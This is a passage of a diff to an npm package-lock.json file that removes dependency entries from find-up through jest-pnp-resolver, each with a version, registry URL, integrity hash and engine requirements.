"sha512-AdJKSPeEHgi7/ZhuIPtcQKr5RQdo6OO2IL87JkianiMYMPbCtot9fxPbrMiBADOWWm3T2si9stAiVsGbTQFkbA==", "dev": true, - "dependencies": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==", - "engines": { - "node": "*" - } - }, - "node_modules/form-data": { - "version": "2.5.1", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.5.1.tgz", - "integrity": "sha512-m21N3WOmEEURgk6B9GLOE4RuWOFf28Lhh9qGYeNlGq4VDXUlJy2th2slBNU8Gp8EzloYZOibZJ7t5ecIrFSjVA==", - "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - }, - "engines": { - "node": ">= 0.12" - } - }, - "node_modules/fs-minipass": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fs-minipass/-/fs-minipass-2.1.0.tgz", - "integrity": "sha512-V/JgOLFCS+R6Vcq0slCuaeWEdNC3ouDlJMNIsacH2VtALiu9mV4LPrHc5cDl8k5aw6J8jwgWWpiTo5RYhmIzvg==", - "dependencies": { - "minipass": "^3.0.0" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/fs-minipass/node_modules/minipass": { - "version": "3.3.6", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.3.6.tgz", - "integrity": "sha512-DxiNidxSEK+tHG6zOIklvNOwm3hvCrbUrdtzY74U6HKTJxvIDfOUL5W5P2Ghd3DTkhhKPYGqeNUIh5qcM4YBfw==", - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/fs-minipass/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" - }, - "node_modules/fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true + "optional": true }, - "node_modules/fsevents": { - "version": "2.3.2", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", - "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", - "dev": true, - "hasInstallScript": true, - "optional": true, - "os": [ - "darwin" - ], - "engines": { - "node": "^8.16.0 || ^10.6.0 || >=11.0.0" - } - }, - "node_modules/function-bind": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", - "integrity": "sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", - "dev": true - }, - "node_modules/gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true, - "engines": { - "node": "6.* || 8.* || >= 10.*" - } - }, - "node_modules/get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true, - "engines": { - "node": ">=8.0.0" - } - }, - "node_modules/get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", - "dependencies": { - "assert-plus": "^1.0.0" - } - }, - "node_modules/glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "dependencies": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - }, - "engines": { - "node": "*" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/graceful-fs": { - "version": "4.2.11", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", - "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", - "dev": true - }, - "node_modules/har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==", - "engines": { - "node": ">=4" - } - }, - "node_modules/har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "deprecated": "this library is no longer supported", - "dependencies": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/has": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", - "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", - "dev": true, - "dependencies": { - "function-bind": "^1.1.1" - }, - "engines": { - "node": ">= 0.4.0" - } - }, - "node_modules/has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "node_modules/http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", - "dependencies": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" - }, - "engines": { - "node": ">=0.8", - "npm": ">=1.3.7" - } - }, - "node_modules/human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true, - "engines": { - "node": ">=10.17.0" - } - }, - "node_modules/import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "dependencies": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - }, - "bin": { - "import-local-fixture": "fixtures/cli.js" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true, - "engines": { - "node": ">=0.8.19" - } - }, - "node_modules/inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "dependencies": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "node_modules/inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "node_modules/ip-address": { - "version": "8.1.0", - "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-8.1.0.tgz", - "integrity": "sha512-Wz91gZKpNKoXtqvY8ScarKYwhXoK4r/b5QuT+uywe/azv0/nUCo7Bh0IRRI7F9DHR06kJNWtzMGLIbXavngbKA==", - "dependencies": { - "jsbn": "1.1.0", - "sprintf-js": "1.1.2" - }, - "engines": { - "node": ">= 12" - } - }, - "node_modules/ip-regex": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ip-regex/-/ip-regex-4.3.0.tgz", - "integrity": "sha512-B9ZWJxHHOHUhUjCPrMpLD4xEq35bUTClHM1S6CBU5ixQnkZmwipwgc96vAd7AAGM9TGHvJR+Uss+/Ak6UphK+Q==", - "engines": { - "node": ">=8" - } - }, - "node_modules/is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "node_modules/is-core-module": { - "version": "2.12.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.12.1.tgz", - "integrity": "sha512-Q4ZuBAe2FUsKtyQJoQHlvP8OvBERxO3jEmy1I7hcRXcJBGGHFh/aJBswbXuS9sgrDH2QUO8ilkwNPHvHMd8clg==", - "dev": true, - "dependencies": { - "has": "^1.0.3" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/is-ip": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/is-ip/-/is-ip-3.1.0.tgz", - "integrity": "sha512-35vd5necO7IitFPjd/YBeqwWnyDWbuLH9ZXQdMfDA8TEo7pv5X8yfrvVO3xbJbLUlERCMvf6X0hTUamQxCYJ9Q==", - "dependencies": { - "ip-regex": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true, - "engines": { - "node": ">=0.12.0" - } - }, - "node_modules/is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" - }, - "node_modules/isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "dev": true - }, - "node_modules/isomorphic-ws": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", - "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", - "peerDependencies": { - "ws": "*" - } - }, - "node_modules/isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" - }, - "node_modules/istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", - "dev": true, - "dependencies": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^3.0.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "dependencies": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-reports": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", - "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", - "dev": true, - "dependencies": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.6.1.tgz", - "integrity": "sha512-Nirw5B4nn69rVUZtemCQhwxOBhm0nsp3hmtF4rzCeWD7BkjAXRIji7xWQfnTNbz9g0aVsBX6aZK3n+23LM6uDw==", - "dev": true, - "dependencies": { - "@jest/core": "^29.6.1", - "@jest/types": "^29.6.1", - "import-local": "^3.0.2", - "jest-cli": "^29.6.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-changed-files": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.5.0.tgz", - "integrity": "sha512-IFG34IUMUaNBIxjQXF/iu7g6EcdMrGRRxaUSw92I/2g2YC6vCdTltl4nHvt7Ci5nSJwXIkCu8Ka1DKF+X7Z1Ag==", - "dev": true, - "dependencies": { - "execa": "^5.0.0", - "p-limit": "^3.1.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-circus": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.6.1.tgz", - "integrity": "sha512-tPbYLEiBU4MYAL2XoZme/bgfUeotpDBd81lgHLCbDZZFaGmECk0b+/xejPFtmiBP87GgP/y4jplcRpbH+fgCzQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^0.7.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.6.1", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "p-limit": "^3.1.0", - "pretty-format": "^29.6.1", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-cli": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.6.1.tgz", - "integrity": "sha512-607dSgTA4ODIN6go9w6xY3EYkyPFGicx51a69H7yfvt7lN53xNswEVLovq+E77VsTRi5fWprLH0yl4DJgE8Ing==", - "dev": true, - "dependencies": { - "@jest/core": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "import-local": "^3.0.2", - "jest-config": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "prompts": "^2.0.1", - "yargs": "^17.3.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-config": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.6.1.tgz", - "integrity": "sha512-XdjYV2fy2xYixUiV2Wc54t3Z4oxYPAELUzWnV6+mcbq0rh742X2p52pii5A3oeRzYjLnQxCsZmp0qpI6klE2cQ==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.6.1", - "@jest/types": "^29.6.1", - "babel-jest": "^29.6.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.6.1", - "jest-environment-node": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@types/node": "*", - "ts-node": ">=9.0.0" - }, - "peerDependenciesMeta": { - "@types/node": { - "optional": true - }, - "ts-node": { - "optional": true - } - } - }, - "node_modules/jest-diff": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.6.1.tgz", - "integrity": "sha512-FsNCvinvl8oVxpNLttNQX7FAq7vR+gMDGj90tiP7siWw1UdakWUGqrylpsYrpvj908IYckm5Y0Q7azNAozU1Kg==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "diff-sequences": "^29.4.3", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-docblock": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.4.3.tgz", - "integrity": "sha512-fzdTftThczeSD9nZ3fzA/4KkHtnmllawWrXO69vtI+L9WjEIuXWs4AmyME7lN5hU7dB0sHhuPfcKofRsUb/2Fg==", - "dev": true, - "dependencies": { - "detect-newline": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-each": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.6.1.tgz", - "integrity": "sha512-n5eoj5eiTHpKQCAVcNTT7DRqeUmJ01hsAL0Q1SMiBHcBcvTKDELixQOGMCpqhbIuTcfC4kMfSnpmDqRgRJcLNQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "jest-util": "^29.6.1", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-environment-node": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.6.1.tgz", - "integrity": "sha512-ZNIfAiE+foBog24W+2caIldl4Irh8Lx1PUhg/GZ0odM1d/h2qORAsejiFc7zb+SEmYPn1yDZzEDSU5PmDkmVLQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-get-type": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.4.3.tgz", - "integrity": "sha512-J5Xez4nRRMjk8emnTpWrlkyb9pfRQQanDrvWHhsR1+VUfbwxi30eVcZFlcdGInRibU4G5LwHXpI7IRHU0CY+gg==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-haste-map": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.6.1.tgz", - "integrity": "sha512-0m7f9PZXxOCk1gRACiVgX85knUKPKLPg4oRCjLoqIm9brTHXaorMA0JpmtmVkQiT8nmXyIVoZd/nnH1cfC33ig==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-leak-detector": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.6.1.tgz", - "integrity": "sha512-OrxMNyZirpOEwkF3UHnIkAiZbtkBWiye+hhBweCHkVbCgyEy71Mwbb5zgeTNYWJBi1qgDVfPC1IwO9dVEeTLwQ==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-matcher-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.6.1.tgz", - "integrity": "sha512-SLaztw9d2mfQQKHmJXKM0HCbl2PPVld/t9Xa6P9sgiExijviSp7TnZZpw2Fpt+OI3nwUO/slJbOfzfUMKKC5QA==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-message-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.6.1.tgz", - "integrity": "sha512-KoAW2zAmNSd3Gk88uJ56qXUWbFk787QKmjjJVOjtGFmmGSZgDBrlIL4AfQw1xyMYPNVD7dNInfIbur9B2rd/wQ==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.1", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-mock": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.6.1.tgz", - "integrity": "sha512-brovyV9HBkjXAEdRooaTQK42n8usKoSRR3gihzUpYeV/vwqgSoNfrksO7UfSACnPmxasO/8TmHM3w9Hp3G1dgw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": 